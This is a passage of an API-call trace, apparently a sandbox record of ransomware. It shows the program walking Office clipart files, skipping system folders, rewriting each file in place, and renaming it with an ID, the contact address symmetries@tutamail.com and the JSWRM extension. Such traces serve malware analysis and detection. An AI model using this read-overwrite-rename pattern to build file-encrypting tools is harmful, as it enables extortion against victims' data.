lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01268_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01268_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0099.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0099.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01268_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01268_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.400] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=427) returned 1 [0099.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a0) returned 0x1ff448 [0099.400] ReadFile (in: hFile=0x314, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345e89c*=0x1a0, lpOverlapped=0x0) returned 1 [0099.401] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.401] WriteFile (in: hFile=0x314, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345e898*=0x1a0, lpOverlapped=0x0) returned 1 [0099.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0099.401] CloseHandle (hObject=0x314) returned 1 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0099.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0099.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0099.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0099.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0099.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01268_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01268_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01268_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01268_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0099.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0099.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.413] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01292_.GIF", cAlternateFileName="")) returned 1 [0099.413] lstrcmpiW (lpString1="WB01292_.GIF", lpString2=".") returned 1 [0099.413] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="..") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="...") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="windows") returned -1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="recovery") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="perflogs") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="documents and settings") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="system volume information") returned 1 [0099.414] lstrcmpiW (lpString1="WB01292_.GIF", lpString2="msocache") returned 1 [0099.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01292_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01292_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01292_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01292_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01292_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01292_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0099.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0099.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01292_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01292_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.415] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=597) returned 1 [0099.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x250) returned 0x20b1f8 [0099.415] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x250, lpOverlapped=0x0) returned 1 [0099.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.416] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x250, lpOverlapped=0x0) returned 1 [0099.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.416] CloseHandle (hObject=0x314) returned 1 [0099.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0099.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0099.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0099.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.417] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01292_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01292_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01292_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01292_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0099.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.419] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01293_.GIF", cAlternateFileName="")) returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2=".") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="..") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="...") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="windows") returned -1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="recovery") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="perflogs") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="documents and settings") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="system volume information") returned 1 [0099.419] lstrcmpiW (lpString1="WB01293_.GIF", lpString2="msocache") returned 1 [0099.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0099.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01293_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01293_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01293_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0099.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01293_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01293_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01293_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0099.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0099.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01293_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01293_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.420] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=679) returned 1 [0099.420] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a0) returned 0x20b1f8 [0099.420] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2a0, lpOverlapped=0x0) returned 1 [0099.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.463] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2a0, lpOverlapped=0x0) returned 1 [0099.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.463] CloseHandle (hObject=0x314) returned 1 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0099.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0099.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0099.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0099.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01293_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01293_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01293_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01293_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0099.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0099.465] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ad, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01294_.GIF", cAlternateFileName="")) returned 1 [0099.465] lstrcmpiW (lpString1="WB01294_.GIF", lpString2=".") returned 1 [0099.465] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="..") returned 1 [0099.465] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="...") returned 1 [0099.465] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="windows") returned -1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="recovery") returned 1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="perflogs") returned 1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="documents and settings") returned 1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="system volume information") returned 1 [0099.466] lstrcmpiW (lpString1="WB01294_.GIF", lpString2="msocache") returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01294_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01294_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01294_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01294_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01294_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01294_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0099.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01294_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01294_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.467] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=685) returned 1 [0099.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a0) returned 0x20b1f8 